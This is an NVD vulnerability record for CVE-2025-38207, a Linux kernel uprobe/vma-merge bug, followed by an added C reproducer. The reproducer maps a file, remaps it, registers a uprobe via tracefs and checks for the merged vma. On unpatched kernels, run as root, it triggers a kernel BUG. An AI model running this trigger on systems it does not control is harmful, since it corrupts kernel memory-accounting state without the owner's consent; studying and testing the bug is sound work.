{"resultsPerPage":1,"startIndex":0,"totalResults":1,"format":"NVD_CVE","version":"2.0","timestamp":"2026-04-19T16:38:52.790","vulnerabilities":[{"cve":{"id":"CVE-2025-38207","sourceIdentifier":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","published":"2025-07-04T14:15:28.823","lastModified":"2025-11-18T17:07:12.037","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"In the Linux kernel, the following vulnerability has been resolved:\n\nmm: fix uprobe pte be overwritten when expanding vma\n\nPatch series \"Fix uprobe pte be overwritten when expanding vma\".\n\n\nThis patch (of 4):\n\nWe encountered a BUG alert triggered by Syzkaller as follows:\n   BUG: Bad rss-counter state mm:00000000b4a60fca type:MM_ANONPAGES val:1\n\nAnd we can reproduce it with the following steps:\n1. register uprobe on file at zero offset\n2. mmap the file at zero offset:\n   addr1 = mmap(NULL, 2 * 4096, PROT_NONE, MAP_PRIVATE, fd, 0);\n3. mremap part of vma1 to new vma2:\n   addr2 = mremap(addr1, 4096, 2 * 4096, MREMAP_MAYMOVE);\n4. mremap back to orig addr1:\n   mremap(addr2, 4096, 4096, MREMAP_MAYMOVE | MREMAP_FIXED, addr1);\n\nIn step 3, the vma1 range [addr1, addr1 + 4096] will be remapped to new vma2\nwith range [addr2, addr2 + 8192], and remap uprobe anon page from the vma1\nto vma2, then unmap the vma1 range [addr1, addr1 + 4096].\n\nIn step 4, the vma2 range [addr2, addr2 + 4096] will be remapped back to the\naddr range [addr1, addr1 + 4096].  Since the addr range [addr1 + 4096,\naddr1 + 8192] still maps the file, it will take vma_merge_new_range to\nexpand the range, and then do uprobe_mmap in vma_complete.  Since the\nmerged vma pgoff is also zero offset, it will install uprobe anon page to\nthe merged vma.  However, the upcoming move_page_tables step, which uses\nset_pte_at to remap the vma2 uprobe pte to the merged vma, will overwrite\nthe new uprobe pte in the merged vma, and leave that pte orphaned.\n\nSince the uprobe pte will be remapped to the merged vma, we can remove the\nunnecessary uprobe_mmap upon merged vma.\n\nThis problem was first found in linux-6.6.y and also exists in the\ncommunity syzkaller:\nhttps://lore.kernel.org/all/000000000000ada39605a5e71711@google.com/T/"},{"lang":"es","value":"In the Linux kernel, the following vulnerability has been resolved: mm: fix uprobe pte being overwritten when expanding vma. Patch series \"Fix uprobe pte being overwritten when expanding vma\". This patch (of 4): We encountered a BUG alert triggered by Syzkaller: BUG: Bad rss-counter state mm:00000000b4a60fca type:MM_ANONPAGES val:1. It can be reproduced with the following steps: 1. Register a uprobe on the file at zero offset. 2. mmap the file at zero offset: addr1 = mmap(NULL, 2 * 4096, PROT_NONE, MAP_PRIVATE, fd, 0); 3. mremap part of vma1 to the new vma2: addr2 = mremap(addr1, 4096, 2 * 4096, MREMAP_MAYMOVE); 4. mremap back to the original addr1: mremap(addr2, 4096, 4096, MREMAP_MAYMOVE | MREMAP_FIXED, addr1); In step 3, the vma1 range [addr1, addr1 + 4096] will be remapped to the new vma2 with range [addr2, addr2 + 8192], the uprobe anon page will be remapped from vma1 to vma2, and the vma1 range [addr1, addr1 + 4096] will then be unmapped. In step 4, the vma2 range [addr2, addr2 + 4096] will be remapped back to the addr range [addr1, addr1 + 4096]. Since the addr range [addr1 + 4096, addr1 + 8192] still maps the file, vma_merge_new_range will be used to expand the range, and uprobe_mmap will then run in vma_complete. Since the merged vma's pgoff is also zero offset, a uprobe anon page will be installed in the merged vma. However, the next step, move_page_tables, which uses set_pte_at to remap the vma2 uprobe pte into the merged vma, will overwrite the new uprobe pte in the merged vma and leave it orphaned. Since the uprobe pte will be remapped to the merged vma, we can remove the unnecessary uprobe_mmap on the merged vma. This problem was first found in linux-6.6.y and also exists in the community syzkaller: https://lore.kernel.org/all/000000000000ada39605a5e71711@google.com/T/"}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":5.5,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":1.8,"impactScore":3.6}]},"weaknesses":[{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*","versionStartIncluding":"3.5","versionEndExcluding":"6.15.4","matchCriteriaId":"70F17898-FFE8-46CE-936C-A820CAF98A94"}]}]}],"references":[{"url":"https://git.kernel.org/stable/c/2b12d06c37fd3a394376f42f026a7478d826ed63","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]},{"url":"https://git.kernel.org/stable/c/58b83b9a9a929611a2a2e7d88f45cb0d786b7ee0","source":"416baaa9-dc9f-4396-8d5f-8c081fb06d67","tags":["Patch"]}]}}]}
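The four reproduction steps in the description are easy to misread as a sequence of unrelated syscalls; what matters for the bug is that step 4 lands a file-offset-0 page directly in front of the leftover second page of vma1, so the kernel merges the two into one vma and, before the fix, installs a second uprobe pte that move_page_tables then clobbers. The program below is an added example written for this page, not code from the NVD record or from the kernel patch: it replays steps 2 to 4 on a throwaway file, generalised from the hard-coded 4096 to the running kernel's page size, and then reads /proc/self/maps to confirm the merged two-page vma at addr1. Step 1 (the uprobe) is attempted through tracefs; the mount point /sys/kernel/tracing, the event name cve_2025_38207_probe and the /tmp location of the file are assumptions, and that step needs root, CONFIG_UPROBE_EVENTS, a filesystem not mounted noexec (otherwise the PROT_NONE mapping lacks VM_MAYEXEC and uprobe_mmap ignores it) and bytes at offset 0 that the architecture's uprobe instruction decoder accepts. The SAMPLE_MAPS text is constructed for the parser check.

```c
/* Added example for CVE-2025-38207 (not from the NVD record or the kernel
 * patch). Replays the commit message's reproducer and checks /proc/self/maps
 * for the merged vma. Assumptions: tracefs at /sys/kernel/tracing, event
 * name cve_2025_38207_probe, temp file under /tmp. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

/* Prototype repeated (identical to glibc/musl) so the file still builds if a
 * harness includes headers before _GNU_SOURCE is seen. */
extern void *mremap(void *addr, size_t old_len, size_t new_len, int flags, ...);
#ifndef MREMAP_MAYMOVE
#define MREMAP_MAYMOVE 1
#endif
#ifndef MREMAP_FIXED
#define MREMAP_FIXED 2
#endif

/* Constructed sample in /proc/<pid>/maps format: a merged two-page file
 * mapping at offset 0 and the one-page remnant of vma2 at offset 0x1000. */
static const char SAMPLE_MAPS[] =
    "7f000000-7f002000 ---p 00000000 00:2a 1234 /tmp/cve-2025-38207-sample\n"
    "7f011000-7f012000 ---p 00001000 00:2a 1234 /tmp/cve-2025-38207-sample\n";

/* Return 1 when 'maps' contains a line whose range is exactly
 * [start, start + len) at file offset 'off', else 0. */
int maps_has_range(const char *maps, unsigned long start, unsigned long len,
                   unsigned long off)
{
    const char *line = maps;
    while (line && *line) {
        unsigned long lo, hi, o;
        char perms[8];
        if (sscanf(line, "%lx-%lx %7s %lx", &lo, &hi, perms, &o) == 4 &&
            lo == start && hi == start + len && o == off)
            return 1;
        line = strchr(line, '\n');
        if (line)
            line++;
    }
    return 0;
}

/* Read a whole (pseudo-)file into a malloc'd, NUL-terminated buffer. */
static char *read_file(const char *file)
{
    int fd = open(file, O_RDONLY);
    if (fd < 0)
        return NULL;
    size_t cap = 65536, len = 0;
    char *buf = malloc(cap);
    ssize_t n;
    while (buf && (n = read(fd, buf + len, cap - len - 1)) > 0) {
        len += (size_t)n;
        if (len + 1 == cap) {                 /* grow before the next read */
            char *nb = realloc(buf, cap * 2);
            if (!nb) { free(buf); buf = NULL; break; }
            buf = nb;
            cap *= 2;
        }
    }
    close(fd);
    if (buf)
        buf[len] = '\0';
    return buf;
}

static int write_str(const char *file, const char *s)
{
    int fd = open(file, O_WRONLY);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, s, strlen(s));
    int saved = errno;
    close(fd);
    errno = saved;
    return n == (ssize_t)strlen(s) ? 0 : -1;
}

/* Step 1: uprobe at offset 0 of 'path' via tracefs (paths and event name are
 * assumptions). Returns 0 if the probe is enabled, -1 if not possible; the
 * caller continues either way, since steps 2-4 do not depend on it. */
int register_uprobe(const char *path)
{
    char cmd[4200];
    snprintf(cmd, sizeof cmd, "p:cve_2025_38207_probe %s:0x0\n", path);
    if (write_str("/sys/kernel/tracing/uprobe_events", cmd) < 0 && errno != EEXIST)
        return -1;
    return write_str("/sys/kernel/tracing/events/uprobes/cve_2025_38207_probe/enable", "1\n");
}

/* Steps 2-4 of the reproducer with 4096 replaced by the real page size.
 * Stores addr1 and returns 0 on success, -1 if a syscall fails. */
int run_vma_sequence(int fd, unsigned long *addr1_out)
{
    unsigned long page = (unsigned long)sysconf(_SC_PAGESIZE);

    /* step 2: two pages of the file at offset 0, no permissions */
    void *addr1 = mmap(NULL, 2 * page, PROT_NONE, MAP_PRIVATE, fd, 0);
    if (addr1 == MAP_FAILED)
        return -1;

    /* step 3: move vma1's first page away, growing the copy to two pages;
     * [addr1 + page, addr1 + 2*page) stays mapped at file offset 'page' */
    void *addr2 = mremap(addr1, page, 2 * page, MREMAP_MAYMOVE);
    if (addr2 == MAP_FAILED)
        return -1;

    /* step 4: move vma2's first page (file offset 0) back to addr1. It is
     * adjacent to and offset-contiguous with the remnant of vma1, so the
     * kernel merges them into one two-page vma whose pgoff is 0. */
    if (mremap(addr2, page, page, MREMAP_MAYMOVE | MREMAP_FIXED, addr1) == MAP_FAILED)
        return -1;

    *addr1_out = (unsigned long)addr1;
    return 0;
}

/* Whole reproducer on a fresh temp file: 1 = merged two-page vma seen at
 * addr1, 0 = sequence ran but no merge, -1 = setup failure. With the uprobe
 * active on an unpatched kernel, "BUG: Bad rss-counter state" is logged when
 * the process exits and the mappings are torn down. */
int reproduce(void)
{
    char path[] = "/tmp/cve-2025-38207-XXXXXX";
    unsigned long page = (unsigned long)sysconf(_SC_PAGESIZE), addr1;
    int result = -1;

    int fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (ftruncate(fd, (off_t)(2 * page)) == 0) {
        if (register_uprobe(path) < 0)
            fprintf(stderr, "uprobe not installed (needs root + tracefs); "
                            "running the vma steps without it\n");
        if (run_vma_sequence(fd, &addr1) == 0) {
            char *maps = read_file("/proc/self/maps");
            if (maps) {
                result = maps_has_range(maps, addr1, 2 * page, 0);
                free(maps);
            }
        }
    }
    close(fd);
    unlink(path);
    return result;
}

int main(void)
{
    int r = reproduce();
    printf("merged two-page vma at addr1: %s\n",
           r == 1 ? "yes" : r == 0 ? "no" : "setup failed");
    return r == 1 ? 0 : 1;
}
```

Run it as an unprivileged user and it only demonstrates the vma merge that the description relies on (the PROT_NONE mapping at addr1 becomes a single two-page entry at offset 0 in /proc/self/maps); run it as root with tracefs available and, on a kernel in the affected range, dmesg shows the rss-counter BUG at exit, while a kernel carrying the referenced patches stays quiet. The registered uprobe event persists across runs; remove it with "-:cve_2025_38207_probe" written to uprobe_events when finished.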